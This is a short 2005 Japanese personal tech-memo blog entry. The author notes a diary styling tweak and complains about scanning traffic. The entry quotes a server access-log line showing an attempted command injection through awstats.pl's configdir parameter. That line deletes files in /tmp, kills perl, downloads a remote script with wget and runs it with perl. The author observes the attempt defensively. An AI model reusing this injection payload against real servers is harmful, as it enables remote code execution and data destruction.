僕の備忘録(PC、UN*X、ネットワーク関連が中心)なんです。
自分の書いたところは適当(な時とか)に書き換えますので御了承を。
がまたウザくなって来た。今度は千歳科学技術大学の方から、らしい。 間口をもっと狭めないと。
にちょっと追記。日記の字を大きく赤くしてみる。
あまり大きいと折り重なってはみだしてしまう。あまり綺麗にはならないかも。
firefox(Linux 及び Tiger)とSafariで確認。 もちろん、w3m では全くわからない。
うじゃうじゃ来た。
入れてないって言ってるのに。
$ grep "awstats.pl" $AGENT_LOG | wc -l
22
$ grep "awstats.pl" $AGENT_LOG | tail -n1
219.166.34.48 - - [14/Aug/2005:10:10:37 +0900] \
"GET /stats/cgi-bin/awstats.pl?configdir=|echo%20;\
cd%20/tmp;rm%20-rf%20*;killall%20-9%20perl;\
wget%20members.lycos.co.uk/newput/a.txt;\
perl%20a.txt;echo%20;rm%20-rf%20a.txt*;\
echo| HTTP/1.1" 404 472 "-" "Mozilla/4.0 \
(compatible; MSIE 6.0; Windows 98)"
ちょっとつつく。
wget で
なにやら取り寄せ、perlに喰わせた後、
消去している模様。
とはいえ、ログを見た限り、awstats.pl自体のセキュリティホールを突いているようには見えなかったり。
これで落せるサーバもあるんだろうか。
類例もう一点にもリンクしとこ。
蛇足。今のうちに
控えを取っておこう。こちらもなくならないうちに
手許にとっとく。
ログに記録されたような自動実行はできない筈だけど、
ご利用は自己責任でどうぞ。
リンクはご自由にどうぞ。でもURLや内容が変った場合はあしからず。